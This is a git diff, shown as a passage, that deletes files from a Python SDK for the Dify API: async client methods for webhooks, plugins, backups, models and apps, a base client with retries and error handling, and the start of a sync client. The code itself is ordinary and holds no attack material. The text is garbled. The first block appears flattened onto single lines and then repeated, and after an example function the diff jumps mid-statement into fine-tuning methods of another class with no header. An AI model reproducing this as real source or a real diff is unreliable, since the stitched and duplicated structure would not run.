"pdf"): - """Generate and download a custom report.""" - params = {"format": format} - url = f"/analytics/reports/{report_id}/generate" - return await self._send_request("GET", url, params=params) - - # Export APIs - async def export_analytics_data(self, data_type: str, start_date: str, end_date: str, format: str = "csv"): - """Export analytics data in specified format.""" - params = { - "data_type": data_type, - "start_date": start_date, - "end_date": end_date, - "format": format, - } - return await self._send_request("GET", "/analytics/export", params=params) - - -class AsyncIntegrationClient(AsyncDifyClient): - """Async Integration and Plugin APIs for Dify platform extensibility.""" - - # Webhook Management APIs - async def list_webhooks(self, page: int = 1, limit: int = 20, status: str | None = None): - """List webhooks with pagination and filtering.""" - params = {"page": page, "limit": limit} - if status: - params["status"] = status - return await self._send_request("GET", "/integrations/webhooks", params=params) - - async def create_webhook(self, webhook_data: Dict[str, Any]): - """Create a new webhook.""" - return await self._send_request("POST", "/integrations/webhooks", json=webhook_data) - - async def get_webhook(self, webhook_id: str): - """Get detailed information about a webhook.""" - url = f"/integrations/webhooks/{webhook_id}" - return await self._send_request("GET", url) - - async def update_webhook(self, webhook_id: str, webhook_data: Dict[str, Any]): - """Update webhook configuration.""" - url = f"/integrations/webhooks/{webhook_id}" - return await self._send_request("PUT", url, json=webhook_data) - - async def delete_webhook(self, webhook_id: str): - """Delete a webhook.""" - url = f"/integrations/webhooks/{webhook_id}" - return await self._send_request("DELETE", url) - - async def test_webhook(self, webhook_id: str): - """Test webhook delivery.""" - url = f"/integrations/webhooks/{webhook_id}/test" - return await self._send_request("POST", url) - - async def get_webhook_logs(self, webhook_id: str, page: int = 1, limit: int = 20): - """Get webhook delivery logs.""" - params = {"page": page, "limit": limit} - url = f"/integrations/webhooks/{webhook_id}/logs" - return await self._send_request("GET", url, params=params) - - # Plugin Management APIs - async def list_plugins(self, page: int = 1, limit: int = 20, category: str | None = None): - """List available plugins.""" - params = {"page": page, "limit": limit} - if category: - params["category"] = category - return await self._send_request("GET", "/integrations/plugins", params=params) - - async def install_plugin(self, plugin_id: str, config: Dict[str, Any] | None = None): - """Install a plugin.""" - data = {"plugin_id": plugin_id} - if config: - data["config"] = config - return await self._send_request("POST", "/integrations/plugins/install", json=data) - - async def get_installed_plugin(self, installation_id: str): - """Get information about an installed plugin.""" - url = f"/integrations/plugins/{installation_id}" - return await self._send_request("GET", url) - - async def update_plugin_config(self, installation_id: str, config: Dict[str, Any]): - """Update plugin configuration.""" - url = f"/integrations/plugins/{installation_id}/config" - return await self._send_request("PUT", url, json=config) - - async def uninstall_plugin(self, installation_id: str): - """Uninstall a plugin.""" - url = f"/integrations/plugins/{installation_id}" - return await self._send_request("DELETE", url) - - async def enable_plugin(self, 
-
-
-class AsyncIntegrationClient(AsyncDifyClient):
-    """Async Integration and Plugin APIs for Dify platform extensibility."""
-
-    # Webhook Management APIs
-    async def list_webhooks(self, page: int = 1, limit: int = 20, status: str | None = None):
-        """List webhooks with pagination and filtering."""
-        params = {"page": page, "limit": limit}
-        if status:
-            params["status"] = status
-        return await self._send_request("GET", "/integrations/webhooks", params=params)
-
-    async def create_webhook(self, webhook_data: Dict[str, Any]):
-        """Create a new webhook."""
-        return await self._send_request("POST", "/integrations/webhooks", json=webhook_data)
-
-    async def get_webhook(self, webhook_id: str):
-        """Get detailed information about a webhook."""
-        url = f"/integrations/webhooks/{webhook_id}"
-        return await self._send_request("GET", url)
-
-    async def update_webhook(self, webhook_id: str, webhook_data: Dict[str, Any]):
-        """Update webhook configuration."""
-        url = f"/integrations/webhooks/{webhook_id}"
-        return await self._send_request("PUT", url, json=webhook_data)
-
-    async def delete_webhook(self, webhook_id: str):
-        """Delete a webhook."""
-        url = f"/integrations/webhooks/{webhook_id}"
-        return await self._send_request("DELETE", url)
-
-    async def test_webhook(self, webhook_id: str):
-        """Test webhook delivery."""
-        url = f"/integrations/webhooks/{webhook_id}/test"
-        return await self._send_request("POST", url)
-
-    async def get_webhook_logs(self, webhook_id: str, page: int = 1, limit: int = 20):
-        """Get webhook delivery logs."""
-        params = {"page": page, "limit": limit}
-        url = f"/integrations/webhooks/{webhook_id}/logs"
-        return await self._send_request("GET", url, params=params)
-
-    # Plugin Management APIs
-    async def list_plugins(self, page: int = 1, limit: int = 20, category: str | None = None):
-        """List available plugins."""
-        params = {"page": page, "limit": limit}
-        if category:
-            params["category"] = category
-        return await self._send_request("GET", "/integrations/plugins", params=params)
-
-    async def install_plugin(self, plugin_id: str, config: Dict[str, Any] | None = None):
-        """Install a plugin."""
-        data = {"plugin_id": plugin_id}
-        if config:
-            data["config"] = config
-        return await self._send_request("POST", "/integrations/plugins/install", json=data)
-
-    async def get_installed_plugin(self, installation_id: str):
-        """Get information about an installed plugin."""
-        url = f"/integrations/plugins/{installation_id}"
-        return await self._send_request("GET", url)
-
-    async def update_plugin_config(self, installation_id: str, config: Dict[str, Any]):
-        """Update plugin configuration."""
-        url = f"/integrations/plugins/{installation_id}/config"
-        return await self._send_request("PUT", url, json=config)
-
-    async def uninstall_plugin(self, installation_id: str):
-        """Uninstall a plugin."""
-        url = f"/integrations/plugins/{installation_id}"
-        return await self._send_request("DELETE", url)
-
-    async def enable_plugin(self, installation_id: str):
-        """Enable a plugin."""
-        url = f"/integrations/plugins/{installation_id}/enable"
-        return await self._send_request("POST", url)
-
-    async def disable_plugin(self, installation_id: str):
-        """Disable a plugin."""
-        url = f"/integrations/plugins/{installation_id}/disable"
-        return await self._send_request("POST", url)
-
-    # Import/Export APIs
-    async def export_app_data(self, app_id: str, format: str = "json", include_data: bool = True):
-        """Export application data."""
-        params = {"format": format, "include_data": include_data}
-        url = f"/integrations/export/apps/{app_id}"
-        return await self._send_request("GET", url, params=params)
-
-    async def import_app_data(self, import_data: Dict[str, Any]):
-        """Import application data."""
-        return await self._send_request("POST", "/integrations/import/apps", json=import_data)
-
-    async def get_import_status(self, import_id: str):
-        """Get import operation status."""
-        url = f"/integrations/import/{import_id}/status"
-        return await self._send_request("GET", url)
-
-    async def export_workspace_data(self, format: str = "json", include_data: bool = True):
-        """Export workspace data."""
-        params = {"format": format, "include_data": include_data}
-        return await self._send_request("GET", "/integrations/export/workspace", params=params)
-
-    async def import_workspace_data(self, import_data: Dict[str, Any]):
-        """Import workspace data."""
-        return await self._send_request("POST", "/integrations/import/workspace", json=import_data)
-
-    # Backup and Restore APIs
-    async def create_backup(self, backup_config: Dict[str, Any] | None = None):
-        """Create a system backup."""
-        data = backup_config or {}
-        return await self._send_request("POST", "/integrations/backup/create", json=data)
-
-    async def list_backups(self, page: int = 1, limit: int = 20):
-        """List available backups."""
-        params = {"page": page, "limit": limit}
-        return await self._send_request("GET", "/integrations/backup", params=params)
-
-    async def get_backup(self, backup_id: str):
-        """Get backup information."""
-        url = f"/integrations/backup/{backup_id}"
-        return await self._send_request("GET", url)
-
-    async def restore_backup(self, backup_id: str, restore_config: Dict[str, Any] | None = None):
-        """Restore from backup."""
-        data = restore_config or {}
-        url = f"/integrations/backup/{backup_id}/restore"
-        return await self._send_request("POST", url, json=data)
-
-    async def delete_backup(self, backup_id: str):
-        """Delete a backup."""
-        url = f"/integrations/backup/{backup_id}"
-        return await self._send_request("DELETE", url)
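-
-
-# Illustrative sketch: registering and test-firing a webhook with the
-# integration client above. The webhook payload shape is a guess, not a
-# documented schema.
-async def _example_integration_usage() -> None:
-    client = AsyncIntegrationClient(api_key="app-your-api-key")
-    created = await client.create_webhook({"url": "https://example.com/hook", "events": ["app.updated"]})
-    webhook_id = created.json().get("id")
-    if webhook_id:
-        await client.test_webhook(webhook_id)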
self._send_request("GET", url) - - async def update_fine_tuning_job(self, job_id: str, job_config: Dict[str, Any]): - """Update fine-tuning job configuration.""" - url = f"/models/fine-tuning/jobs/{job_id}" - return await self._send_request("PUT", url, json=job_config) - - async def cancel_fine_tuning_job(self, job_id: str): - """Cancel a fine-tuning job.""" - url = f"/models/fine-tuning/jobs/{job_id}/cancel" - return await self._send_request("POST", url) - - async def resume_fine_tuning_job(self, job_id: str): - """Resume a paused fine-tuning job.""" - url = f"/models/fine-tuning/jobs/{job_id}/resume" - return await self._send_request("POST", url) - - async def get_fine_tuning_job_metrics(self, job_id: str): - """Get fine-tuning job training metrics.""" - url = f"/models/fine-tuning/jobs/{job_id}/metrics" - return await self._send_request("GET", url) - - async def get_fine_tuning_job_logs(self, job_id: str, page: int = 1, limit: int = 50): - """Get fine-tuning job logs.""" - params = {"page": page, "limit": limit} - url = f"/models/fine-tuning/jobs/{job_id}/logs" - return await self._send_request("GET", url, params=params) - - # Custom Model Deployment APIs - async def list_custom_deployments(self, page: int = 1, limit: int = 20, status: str | None = None): - """List custom model deployments.""" - params = {"page": page, "limit": limit} - if status: - params["status"] = status - return await self._send_request("GET", "/models/custom/deployments", params=params) - - async def create_custom_deployment(self, deployment_config: Dict[str, Any]): - """Create a custom model deployment.""" - return await self._send_request("POST", "/models/custom/deployments", json=deployment_config) - - async def get_custom_deployment(self, deployment_id: str): - """Get custom deployment details.""" - url = f"/models/custom/deployments/{deployment_id}" - return await self._send_request("GET", url) - - async def update_custom_deployment(self, deployment_id: str, deployment_config: Dict[str, Any]): - """Update custom deployment configuration.""" - url = f"/models/custom/deployments/{deployment_id}" - return await self._send_request("PUT", url, json=deployment_config) - - async def delete_custom_deployment(self, deployment_id: str): - """Delete a custom deployment.""" - url = f"/models/custom/deployments/{deployment_id}" - return await self._send_request("DELETE", url) - - async def scale_custom_deployment(self, deployment_id: str, scale_config: Dict[str, Any]): - """Scale custom deployment resources.""" - url = f"/models/custom/deployments/{deployment_id}/scale" - return await self._send_request("POST", url, json=scale_config) - - async def restart_custom_deployment(self, deployment_id: str): - """Restart a custom deployment.""" - url = f"/models/custom/deployments/{deployment_id}/restart" - return await self._send_request("POST", url) - - # Model Performance Monitoring APIs - async def get_model_performance_history( - self, - model_provider: str, - model_name: str, - start_date: str, - end_date: str, - metrics: List[str] | None = None, - ): - """Get model performance history.""" - params = {"start_date": start_date, "end_date": end_date} - if metrics: - params["metrics"] = ",".join(metrics) - url = f"/models/{model_provider}/{model_name}/performance/history" - return await self._send_request("GET", url, params=params) - - async def get_model_health_metrics(self, model_provider: str, model_name: str): - """Get real-time model health metrics.""" - url = f"/models/{model_provider}/{model_name}/health" - return await 
self._send_request("GET", url) - - async def get_model_usage_stats( - self, - model_provider: str, - model_name: str, - start_date: str, - end_date: str, - granularity: str = "day", - ): - """Get model usage statistics.""" - params = { - "start_date": start_date, - "end_date": end_date, - "granularity": granularity, - } - url = f"/models/{model_provider}/{model_name}/usage" - return await self._send_request("GET", url, params=params) - - async def get_model_cost_analysis(self, model_provider: str, model_name: str, start_date: str, end_date: str): - """Get model cost analysis.""" - params = {"start_date": start_date, "end_date": end_date} - url = f"/models/{model_provider}/{model_name}/costs" - return await self._send_request("GET", url, params=params) - - # Model Versioning APIs - async def list_model_versions(self, model_provider: str, model_name: str, page: int = 1, limit: int = 20): - """List model versions.""" - params = {"page": page, "limit": limit} - url = f"/models/{model_provider}/{model_name}/versions" - return await self._send_request("GET", url, params=params) - - async def create_model_version(self, model_provider: str, model_name: str, version_config: Dict[str, Any]): - """Create a new model version.""" - url = f"/models/{model_provider}/{model_name}/versions" - return await self._send_request("POST", url, json=version_config) - - async def get_model_version(self, model_provider: str, model_name: str, version_id: str): - """Get model version details.""" - url = f"/models/{model_provider}/{model_name}/versions/{version_id}" - return await self._send_request("GET", url) - - async def promote_model_version(self, model_provider: str, model_name: str, version_id: str): - """Promote model version to production.""" - url = f"/models/{model_provider}/{model_name}/versions/{version_id}/promote" - return await self._send_request("POST", url) - - async def rollback_model_version(self, model_provider: str, model_name: str, version_id: str): - """Rollback to a specific model version.""" - url = f"/models/{model_provider}/{model_name}/versions/{version_id}/rollback" - return await self._send_request("POST", url) - - # Model Registry APIs - async def list_registry_models(self, page: int = 1, limit: int = 20, filter: str | None = None): - """List models in registry.""" - params = {"page": page, "limit": limit} - if filter: - params["filter"] = filter - return await self._send_request("GET", "/models/registry", params=params) - - async def register_model(self, model_config: Dict[str, Any]): - """Register a new model in the registry.""" - return await self._send_request("POST", "/models/registry", json=model_config) - - async def get_registry_model(self, model_id: str): - """Get registered model details.""" - url = f"/models/registry/{model_id}" - return await self._send_request("GET", url) - - async def update_registry_model(self, model_id: str, model_config: Dict[str, Any]): - """Update registered model information.""" - url = f"/models/registry/{model_id}" - return await self._send_request("PUT", url, json=model_config) - - async def unregister_model(self, model_id: str): - """Unregister a model from the registry.""" - url = f"/models/registry/{model_id}" - return await self._send_request("DELETE", url) - - -class AsyncAdvancedAppClient(AsyncDifyClient): - """Async Advanced App Configuration APIs for comprehensive app management.""" - - # App Creation and Management APIs - async def create_app(self, app_config: Dict[str, Any]): - """Create a new application.""" - return await 
self._send_request("POST", "/apps", json=app_config) - - async def list_apps( - self, - page: int = 1, - limit: int = 20, - app_type: str | None = None, - status: str | None = None, - ): - """List applications with filtering.""" - params = {"page": page, "limit": limit} - if app_type: - params["app_type"] = app_type - if status: - params["status"] = status - return await self._send_request("GET", "/apps", params=params) - - async def get_app(self, app_id: str): - """Get detailed application information.""" - url = f"/apps/{app_id}" - return await self._send_request("GET", url) - - async def update_app(self, app_id: str, app_config: Dict[str, Any]): - """Update application configuration.""" - url = f"/apps/{app_id}" - return await self._send_request("PUT", url, json=app_config) - - async def delete_app(self, app_id: str): - """Delete an application.""" - url = f"/apps/{app_id}" - return await self._send_request("DELETE", url) - - async def duplicate_app(self, app_id: str, duplicate_config: Dict[str, Any]): - """Duplicate an application.""" - url = f"/apps/{app_id}/duplicate" - return await self._send_request("POST", url, json=duplicate_config) - - async def archive_app(self, app_id: str): - """Archive an application.""" - url = f"/apps/{app_id}/archive" - return await self._send_request("POST", url) - - async def restore_app(self, app_id: str): - """Restore an archived application.""" - url = f"/apps/{app_id}/restore" - return await self._send_request("POST", url) - - # App Publishing and Versioning APIs - async def publish_app(self, app_id: str, publish_config: Dict[str, Any] | None = None): - """Publish an application.""" - data = publish_config or {} - url = f"/apps/{app_id}/publish" - return await self._send_request("POST", url, json=data) - - async def unpublish_app(self, app_id: str): - """Unpublish an application.""" - url = f"/apps/{app_id}/unpublish" - return await self._send_request("POST", url) - - async def list_app_versions(self, app_id: str, page: int = 1, limit: int = 20): - """List application versions.""" - params = {"page": page, "limit": limit} - url = f"/apps/{app_id}/versions" - return await self._send_request("GET", url, params=params) - - async def create_app_version(self, app_id: str, version_config: Dict[str, Any]): - """Create a new application version.""" - url = f"/apps/{app_id}/versions" - return await self._send_request("POST", url, json=version_config) - - async def get_app_version(self, app_id: str, version_id: str): - """Get application version details.""" - url = f"/apps/{app_id}/versions/{version_id}" - return await self._send_request("GET", url) - - async def rollback_app_version(self, app_id: str, version_id: str): - """Rollback application to a specific version.""" - url = f"/apps/{app_id}/versions/{version_id}/rollback" - return await self._send_request("POST", url) - - # App Template APIs - async def list_app_templates(self, page: int = 1, limit: int = 20, category: str | None = None): - """List available app templates.""" - params = {"page": page, "limit": limit} - if category: - params["category"] = category - return await self._send_request("GET", "/apps/templates", params=params) - - async def get_app_template(self, template_id: str): - """Get app template details.""" - url = f"/apps/templates/{template_id}" - return await self._send_request("GET", url) - - async def create_app_from_template(self, template_id: str, app_config: Dict[str, Any]): - """Create an app from a template.""" - url = f"/apps/templates/{template_id}/create" - return await 
self._send_request("POST", url, json=app_config) - - async def create_custom_template(self, app_id: str, template_config: Dict[str, Any]): - """Create a custom template from an existing app.""" - url = f"/apps/{app_id}/create-template" - return await self._send_request("POST", url, json=template_config) - - # App Analytics and Metrics APIs - async def get_app_analytics( - self, - app_id: str, - start_date: str, - end_date: str, - metrics: List[str] | None = None, - ): - """Get application analytics.""" - params = {"start_date": start_date, "end_date": end_date} - if metrics: - params["metrics"] = ",".join(metrics) - url = f"/apps/{app_id}/analytics" - return await self._send_request("GET", url, params=params) - - async def get_app_user_feedback(self, app_id: str, page: int = 1, limit: int = 20, rating: int | None = None): - """Get user feedback for an application.""" - params = {"page": page, "limit": limit} - if rating: - params["rating"] = rating - url = f"/apps/{app_id}/feedback" - return await self._send_request("GET", url, params=params) - - async def get_app_error_logs( - self, - app_id: str, - start_date: str, - end_date: str, - error_type: str | None = None, - page: int = 1, - limit: int = 20, - ): - """Get application error logs.""" - params = { - "start_date": start_date, - "end_date": end_date, - "page": page, - "limit": limit, - } - if error_type: - params["error_type"] = error_type - url = f"/apps/{app_id}/errors" - return await self._send_request("GET", url, params=params) - - # Advanced Configuration APIs - async def get_app_advanced_config(self, app_id: str): - """Get advanced application configuration.""" - url = f"/apps/{app_id}/advanced-config" - return await self._send_request("GET", url) - - async def update_app_advanced_config(self, app_id: str, config: Dict[str, Any]): - """Update advanced application configuration.""" - url = f"/apps/{app_id}/advanced-config" - return await self._send_request("PUT", url, json=config) - - async def get_app_environment_variables(self, app_id: str): - """Get application environment variables.""" - url = f"/apps/{app_id}/environment" - return await self._send_request("GET", url) - - async def update_app_environment_variables(self, app_id: str, variables: Dict[str, str]): - """Update application environment variables.""" - url = f"/apps/{app_id}/environment" - return await self._send_request("PUT", url, json=variables) - - async def get_app_resource_limits(self, app_id: str): - """Get application resource limits.""" - url = f"/apps/{app_id}/resource-limits" - return await self._send_request("GET", url) - - async def update_app_resource_limits(self, app_id: str, limits: Dict[str, Any]): - """Update application resource limits.""" - url = f"/apps/{app_id}/resource-limits" - return await self._send_request("PUT", url, json=limits) - - # App Integration APIs - async def get_app_integrations(self, app_id: str): - """Get application integrations.""" - url = f"/apps/{app_id}/integrations" - return await self._send_request("GET", url) - - async def add_app_integration(self, app_id: str, integration_config: Dict[str, Any]): - """Add integration to application.""" - url = f"/apps/{app_id}/integrations" - return await self._send_request("POST", url, json=integration_config) - - async def update_app_integration(self, app_id: str, integration_id: str, config: Dict[str, Any]): - """Update application integration.""" - url = f"/apps/{app_id}/integrations/{integration_id}" - return await self._send_request("PUT", url, json=config) - - async def 
remove_app_integration(self, app_id: str, integration_id: str): - """Remove integration from application.""" - url = f"/apps/{app_id}/integrations/{integration_id}" - return await self._send_request("DELETE", url) - - async def test_app_integration(self, app_id: str, integration_id: str): - """Test application integration.""" - url = f"/apps/{app_id}/integrations/{integration_id}/test" - return await self._send_request("POST", url) diff --git a/sdks/python-client/dify_client/base_client.py b/sdks/python-client/dify_client/base_client.py deleted file mode 100644 index 0ad6e07b23..0000000000 --- a/sdks/python-client/dify_client/base_client.py +++ /dev/null @@ -1,228 +0,0 @@ -"""Base client with common functionality for both sync and async clients.""" - -import json -import time -import logging -from typing import Dict, Callable, Optional - -try: - # Python 3.10+ - from typing import ParamSpec -except ImportError: - # Python < 3.10 - from typing_extensions import ParamSpec - -from urllib.parse import urljoin - -import httpx - -P = ParamSpec("P") - -from .exceptions import ( - DifyClientError, - APIError, - AuthenticationError, - RateLimitError, - ValidationError, - NetworkError, - TimeoutError, -) - - -class BaseClientMixin: - """Mixin class providing common functionality for Dify clients.""" - - def __init__( - self, - api_key: str, - base_url: str = "https://api.dify.ai/v1", - timeout: float = 60.0, - max_retries: int = 3, - retry_delay: float = 1.0, - enable_logging: bool = False, - ): - """Initialize the base client. - - Args: - api_key: Your Dify API key - base_url: Base URL for the Dify API - timeout: Request timeout in seconds - max_retries: Maximum number of retry attempts - retry_delay: Delay between retries in seconds - enable_logging: Enable detailed logging - """ - if not api_key: - raise ValidationError("API key is required") - - self.api_key = api_key - self.base_url = base_url.rstrip("/") - self.timeout = timeout - self.max_retries = max_retries - self.retry_delay = retry_delay - self.enable_logging = enable_logging - - # Setup logging - self.logger = logging.getLogger(f"dify_client.{self.__class__.__name__.lower()}") - if enable_logging and not self.logger.handlers: - # Create console handler with formatter - handler = logging.StreamHandler() - formatter = logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s") - handler.setFormatter(formatter) - self.logger.addHandler(handler) - self.logger.setLevel(logging.INFO) - self.enable_logging = True - else: - self.enable_logging = enable_logging - - def _get_headers(self, content_type: str = "application/json") -> Dict[str, str]: - """Get common request headers.""" - return { - "Authorization": f"Bearer {self.api_key}", - "Content-Type": content_type, - "User-Agent": "dify-client-python/0.1.12", - } - - def _build_url(self, endpoint: str) -> str: - """Build full URL from endpoint.""" - return urljoin(self.base_url + "/", endpoint.lstrip("/")) - - def _handle_response(self, response: httpx.Response) -> httpx.Response: - """Handle HTTP response and raise appropriate exceptions.""" - try: - if response.status_code == 401: - raise AuthenticationError( - "Authentication failed. Check your API key.", - status_code=response.status_code, - response=response.json() if response.content else None, - ) - elif response.status_code == 429: - retry_after = response.headers.get("Retry-After") - raise RateLimitError( - "Rate limit exceeded. 
Please try again later.", - retry_after=int(retry_after) if retry_after else None, - ) - elif response.status_code >= 400: - try: - error_data = response.json() - message = error_data.get("message", f"HTTP {response.status_code}") - except: - message = f"HTTP {response.status_code}: {response.text}" - - raise APIError( - message, - status_code=response.status_code, - response=response.json() if response.content else None, - ) - - return response - - except json.JSONDecodeError: - raise APIError( - f"Invalid JSON response: {response.text}", - status_code=response.status_code, - ) - - def _retry_request( - self, - request_func: Callable[P, httpx.Response], - request_context: str | None = None, - *args: P.args, - **kwargs: P.kwargs, - ) -> httpx.Response: - """Retry a request with exponential backoff. - - Args: - request_func: Function that performs the HTTP request - request_context: Context description for logging (e.g., "GET /v1/messages") - *args: Positional arguments to pass to request_func - **kwargs: Keyword arguments to pass to request_func - - Returns: - httpx.Response: Successful response - - Raises: - NetworkError: On network failures after retries - TimeoutError: On timeout failures after retries - APIError: On API errors (4xx/5xx responses) - DifyClientError: On unexpected failures - """ - last_exception = None - - for attempt in range(self.max_retries + 1): - try: - response = request_func(*args, **kwargs) - return response # Let caller handle response processing - - except (httpx.NetworkError, httpx.TimeoutException) as e: - last_exception = e - context_msg = f" {request_context}" if request_context else "" - - if attempt < self.max_retries: - delay = self.retry_delay * (2**attempt) # Exponential backoff - self.logger.warning( - f"Request failed{context_msg} (attempt {attempt + 1}/{self.max_retries + 1}): {e}. " - f"Retrying in {delay:.2f} seconds..." 
- ) - time.sleep(delay) - else: - self.logger.error(f"Request failed{context_msg} after {self.max_retries + 1} attempts: {e}") - # Convert to custom exceptions - if isinstance(e, httpx.TimeoutException): - from .exceptions import TimeoutError - - raise TimeoutError(f"Request timed out after {self.max_retries} retries{context_msg}") from e - else: - from .exceptions import NetworkError - - raise NetworkError( - f"Network error after {self.max_retries} retries{context_msg}: {str(e)}" - ) from e - - if last_exception: - raise last_exception - raise DifyClientError("Request failed after retries") - - def _validate_params(self, **params) -> None: - """Validate request parameters.""" - for key, value in params.items(): - if value is None: - continue - - # String validations - if isinstance(value, str): - if not value.strip(): - raise ValidationError(f"Parameter '{key}' cannot be empty or whitespace only") - if len(value) > 10000: - raise ValidationError(f"Parameter '{key}' exceeds maximum length of 10000 characters") - - # List validations - elif isinstance(value, list): - if len(value) > 1000: - raise ValidationError(f"Parameter '{key}' exceeds maximum size of 1000 items") - - # Dictionary validations - elif isinstance(value, dict): - if len(value) > 100: - raise ValidationError(f"Parameter '{key}' exceeds maximum size of 100 items") - - # Type-specific validations - if key == "user" and not isinstance(value, str): - raise ValidationError(f"Parameter '{key}' must be a string") - elif key in ["page", "limit", "page_size"] and not isinstance(value, int): - raise ValidationError(f"Parameter '{key}' must be an integer") - elif key == "files" and not isinstance(value, (list, dict)): - raise ValidationError(f"Parameter '{key}' must be a list or dict") - elif key == "rating" and value not in ["like", "dislike"]: - raise ValidationError(f"Parameter '{key}' must be 'like' or 'dislike'") - - def _log_request(self, method: str, url: str, **kwargs) -> None: - """Log request details.""" - self.logger.info(f"Making {method} request to {url}") - if kwargs.get("json"): - self.logger.debug(f"Request body: {kwargs['json']}") - if kwargs.get("params"): - self.logger.debug(f"Query params: {kwargs['params']}") - - def _log_response(self, response: httpx.Response) -> None: - """Log response details.""" - self.logger.info(f"Received response: {response.status_code} ({len(response.content)} bytes)") diff --git a/sdks/python-client/dify_client/client.py b/sdks/python-client/dify_client/client.py deleted file mode 100644 index cebdf6845c..0000000000 --- a/sdks/python-client/dify_client/client.py +++ /dev/null @@ -1,1267 +0,0 @@ -import json -import logging -import os -from typing import Literal, Dict, List, Any, IO, Optional, Union - -import httpx -from .base_client import BaseClientMixin -from .exceptions import ( - APIError, - AuthenticationError, - RateLimitError, - ValidationError, - FileUploadError, - ) - - -class DifyClient(BaseClientMixin): - """Synchronous Dify API client. - - This client uses httpx.Client for efficient connection pooling and resource management. - It's recommended to use this client as a context manager: - - Example: - with DifyClient(api_key="your-key") as client: - response = client.get_app_info() - """ - - def __init__( - self, - api_key: str, - base_url: str = "https://api.dify.ai/v1", - timeout: float = 60.0, - max_retries: int = 3, - retry_delay: float = 1.0, - enable_logging: bool = False, - ): - """Initialize the Dify client. - - Args: - api_key: Your Dify API key - base_url: Base URL for the Dify API - timeout: Request timeout in seconds (default: 60.0) - max_retries: Maximum number of retry attempts (default: 3) - retry_delay: Delay between retries in seconds (default: 1.0) - enable_logging: Whether to enable request logging (default: False) - """ - # Initialize base client functionality - BaseClientMixin.__init__(self, api_key, base_url, timeout, max_retries, retry_delay, enable_logging) - - self._client = httpx.Client( - base_url=base_url, - timeout=httpx.Timeout(timeout, connect=5.0), - ) - - def __enter__(self): - """Support context manager protocol.""" - return self - - def __exit__(self, exc_type, exc_val, exc_tb): - """Clean up resources when exiting context.""" - self.close() - - def close(self): - """Close the HTTP client and release resources.""" - if hasattr(self, "_client"): - self._client.close()
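With `close()` in place, the class docstring's context-manager recommendation can be shown end to end. A minimal sketch using only names defined in this diff; with the defaults above, `_retry_request` waits 1 s, 2 s, then 4 s between the four attempts before the typed exception surfaces.

```python
# Sketch: context-manager usage plus the typed error contract above.
from dify_client import DifyClient
from dify_client.exceptions import APIError, NetworkError, RateLimitError, TimeoutError

try:
    with DifyClient(api_key="your-api-key", max_retries=3, retry_delay=1.0) as client:
        response = client.get_app_info()
        print(response.json())
except RateLimitError as e:
    # retry_after is parsed from the Retry-After header when present.
    print(f"Rate limited; retry after {e.retry_after} seconds")
except (NetworkError, TimeoutError) as e:
    print(f"Transport failure after all retry attempts: {e}")
except APIError as e:
    print(f"API error {e.status_code}: {e.message}")
```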
 - def _send_request( - self, - method: str, - endpoint: str, - json: Dict[str, Any] | None = None, - params: Dict[str, Any] | None = None, - stream: bool = False, - **kwargs, - ): - """Send an HTTP request to the Dify API with retry logic. - - Args: - method: HTTP method (GET, POST, PUT, PATCH, DELETE) - endpoint: API endpoint path - json: JSON request body - params: Query parameters - stream: Whether to stream the response - **kwargs: Additional arguments to pass to httpx.request - - Returns: - httpx.Response object - """ - # Validate parameters - if json: - self._validate_params(**json) - if params: - self._validate_params(**params) - - headers = { - "Authorization": f"Bearer {self.api_key}", - "Content-Type": "application/json", - } - - def make_request(): - """Inner function to perform the actual HTTP request.""" - # Log request if logging is enabled - if self.enable_logging: - self.logger.info(f"Sending {method} request to {endpoint}") - # Debug logging for detailed information - if self.logger.isEnabledFor(logging.DEBUG): - if json: - self.logger.debug(f"Request body: {json}") - if params: - self.logger.debug(f"Request params: {params}") - - # httpx.Client automatically prepends base_url - response = self._client.request( - method, - endpoint, - json=json, - params=params, - headers=headers, - **kwargs, - ) - - # Log response if logging is enabled - if self.enable_logging: - self.logger.info(f"Received response: {response.status_code}") - - return response - - # Use the retry mechanism from base client - request_context = f"{method} {endpoint}" - response = self._retry_request(make_request, request_context) - - # Handle error responses (API errors don't retry) - self._handle_error_response(response) - - return response - - def _handle_error_response(self, response, is_upload_request: bool = False) -> None: - """Handle HTTP error responses and raise appropriate exceptions.""" - - if response.status_code < 400: - return # Success response - - try: - error_data = response.json() - message = error_data.get("message", f"HTTP {response.status_code}") - except (ValueError, KeyError): - message = f"HTTP {response.status_code}" - error_data = None - - # Log error response if logging is enabled - if self.enable_logging: - self.logger.error(f"API error: {response.status_code} - {message}") - - if response.status_code == 401: - raise AuthenticationError(message, response.status_code, error_data) - elif response.status_code == 429: - retry_after = response.headers.get("Retry-After") - raise RateLimitError(message, retry_after) - elif response.status_code == 422: - raise ValidationError(message, 
response.status_code, error_data) - elif response.status_code == 400: - # Check if this is a file upload error based on the URL or context - current_url = getattr(response, "url", "") or "" - if is_upload_request or "upload" in str(current_url).lower() or "files" in str(current_url).lower(): - raise FileUploadError(message, response.status_code, error_data) - else: - raise APIError(message, response.status_code, error_data) - elif response.status_code >= 500: - # Server errors should raise APIError - raise APIError(message, response.status_code, error_data) - elif response.status_code >= 400: - raise APIError(message, response.status_code, error_data) - - def _send_request_with_files(self, method: str, endpoint: str, data: dict, files: dict): - """Send an HTTP request with file uploads. - - Args: - method: HTTP method (POST, PUT, etc.) - endpoint: API endpoint path - data: Form data - files: Files to upload - - Returns: - httpx.Response object - """ - headers = {"Authorization": f"Bearer {self.api_key}"} - - # Log file upload request if logging is enabled - if self.enable_logging: - self.logger.info(f"Sending {method} file upload request to {endpoint}") - self.logger.debug(f"Form data: {data}") - self.logger.debug(f"Files: {files}") - - response = self._client.request( - method, - endpoint, - data=data, - headers=headers, - files=files, - ) - - # Log response if logging is enabled - if self.enable_logging: - self.logger.info(f"Received file upload response: {response.status_code}") - - # Handle error responses - self._handle_error_response(response, is_upload_request=True) - - return response - - def message_feedback(self, message_id: str, rating: Literal["like", "dislike"], user: str): - self._validate_params(message_id=message_id, rating=rating, user=user) - data = {"rating": rating, "user": user} - return self._send_request("POST", f"/messages/{message_id}/feedbacks", data) - - def get_application_parameters(self, user: str): - params = {"user": user} - return self._send_request("GET", "/parameters", params=params) - - def file_upload(self, user: str, files: dict): - data = {"user": user} - return self._send_request_with_files("POST", "/files/upload", data=data, files=files) - - def text_to_audio(self, text: str, user: str, streaming: bool = False): - data = {"text": text, "user": user, "streaming": streaming} - return self._send_request("POST", "/text-to-audio", json=data) - - def get_meta(self, user: str): - params = {"user": user} - return self._send_request("GET", "/meta", params=params) - - def 